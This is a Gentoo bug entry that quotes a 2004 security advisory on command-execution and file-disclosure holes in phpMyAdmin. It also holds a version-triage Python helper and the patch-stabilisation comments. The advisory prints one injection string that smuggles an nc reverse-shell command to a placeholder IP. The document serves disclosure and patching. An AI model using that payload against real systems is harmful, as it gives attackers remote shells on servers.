Bug#: 74303
Status: RESOLVED
Resolution: FIXED
Assigned To: Gentoo Security <security@gentoo.org>
Reporter: Aarni Honka <aarni.honka@gmail.com>

Description:   Opened: 2004-12-13 10:23 0000
                                Exaprobe
                            www.exaprobe.com

                           Security Advisory

 Advisory Name: Multiple vulnerabilities in phpMyAdmin
  Release Date: 13 December 2004
   Application: phpMyAdmin prior to 2.6.1-rc1
      Platform: Any webserver running PHP
      Severity: Remote code execution
        Author: Nicolas Gregoire <ngregoire@exaprobe.com>
 Vendor Status: Updated code is available
CVE Candidates: CAN-2004-1147 and CAN-2004-1148
     Reference: www.exaprobe.com/labs/advisories/esa-2004-1213.html


Overview :
==========

phpMyAdmin is a tool written in PHP intended to handle the 
administration of MySQL over the Web. Currently it can create and
drop databases, create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields, manage privileges,
export data into various formats and is available in 47 languages.


Technical details :
===================

Command execution :

	- bug introduced in 2.6.0-pl2
	- attacker does *not* need access to the phpMyAdmin interface
	- PHP safe mode must be off
	- external transformations must be activated
	- sample of offensive value : F\';nc -e /bin/sh $IP 80;echo \'A

File disclosure :

	- attacker needs access to the phpMyAdmin interface
	- PHP safe mode must be off
	- $cfg['UploadDir'] must be defined
	- exploitation is done via 'sql_localfile'


Vendor Response :
=================

After notification by Exaprobe, maintainers of the phpMyAdmin
project have released version 2.6.1-rc1 which fixes these two
vulnerabilities.


Recommendation :
================

Upgrade to 2.6.1-rc1 or newer.
Deactivate uploads and transformations if possible.


CVE Information :
=================

The Common Vulnerabilities and Exposures (CVE) project has assigned 
the following names to these issues.  These are candidates for 
inclusion in the CVE list (http://cve.mitre.org), which standardizes 
names for security problems.

  CAN-2004-1147  Command execution in phpMyAdmin
  CAN-2004-1148  File disclosure in phpMyAdmin
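
Added example, not part of the Exaprobe advisory or of phpMyAdmin: a triage helper that maps an installed version and the advisory's stated preconditions to the CVE candidates that apply. The function and parameter names are hypothetical, and the suffix ordering (alpha/beta/rc before the plain release, plN after it) is an assumption about phpMyAdmin 2.x version naming; Gentoo's underscore form (2.6.1_rc1) is accepted too.

```python
import re

# Suffix ranks: pre-releases sort before the plain release, patch levels after.
# Assumption: phpMyAdmin 2.x naming (alpha/beta/rc before release, plN after).
_RANK = {"alpha": -3, "beta": -2, "rc": -1, "": 0, "pl": 1}
_VERSION = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:[-_]?(alpha|beta|rc|pl)(\d*))?$")


def parse_version(text):
    """Turn '2.6.0-pl2' or Gentoo's '2.6.1_rc1' into a sortable tuple."""
    m = _VERSION.match(text.strip().lower())
    if not m:
        raise ValueError("unrecognised phpMyAdmin version: %r" % text)
    major, minor, patch, tag, num = m.groups()
    return (int(major), int(minor), int(patch), _RANK[tag or ""], int(num or 0))


FIXED_IN = parse_version("2.6.1-rc1")        # fix release named in the advisory
CMD_EXEC_SINCE = parse_version("2.6.0-pl2")  # release that introduced CAN-2004-1147


def applicable_issues(version, upload_dir_set, external_transforms_on, safe_mode_on):
    """Return the CVE candidates whose advisory preconditions all hold."""
    v = parse_version(version)
    issues = []
    if v >= FIXED_IN or safe_mode_on:
        return issues  # both issues need an unfixed version and PHP safe mode off
    if v >= CMD_EXEC_SINCE and external_transforms_on:
        issues.append("CAN-2004-1147")  # command execution
    if upload_dir_set:
        issues.append("CAN-2004-1148")  # file disclosure via $cfg['UploadDir']
    return issues


if __name__ == "__main__":
    # Constructed sample inventory:
    # (version, UploadDir set, external transformations on, safe mode on)
    samples = [
        ("2.6.0-pl1", True, True, False),
        ("2.6.0-pl3", False, True, False),
        ("2.6.1_rc1", True, True, False),
    ]
    for sample in samples:
        print(sample[0], applicable_issues(*sample))
```

An empty result only means the advisory's listed preconditions are not all met; upgrading to 2.6.1-rc1 or newer remains the fix.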

------- Comment #1 From Sune Kloppenborg Jeppesen 2004-12-13 11:33:22 0000 -------
Tom please advise.

------- Comment #2 From Tom Payne (RETIRED) 2004-12-14 03:44:18 0000 -------
2.6.1_rc1 contains fix. Stable on x86. Other arches, please mark stable.

Cheers,

Tom

------- Comment #3 From Sune Kloppenborg Jeppesen 2004-12-14 04:01:43 0000 -------
Thx Tom,

Arches please mark 2.6.1_rc1 stable.

------- Comment #4 From Guy Martin 2004-12-14 06:49:39 0000 -------
Stable on hppa.

------- Comment #5 From Bryan Østergaard (RETIRED) 2004-12-14 14:21:35 0000 -------
Alpha stable.

------- Comment #6 From Jason Wever (RETIRED) 2004-12-14 17:39:11 0000 -------
Stable
On
SPARC

------- Comment #7 From Jochen Maes (RETIRED) 2004-12-14 22:49:08 0000 -------
stable on PPC

------- Comment #8 From Jochen Maes (RETIRED) 2004-12-15 04:19:19 0000 -------
forgot to remove the mail

------- Comment #9 From Simon Stelling (RETIRED) 2004-12-16 11:06:32 0000 -------
amd64 done

------- Comment #10 From Thierry Carrez (RETIRED) 2004-12-17 14:25:54 0000 -------
Ready to go

------- Comment #11 From Sune Kloppenborg Jeppesen 2004-12-19 12:24:19 0000 -------
GLSA 200412-19
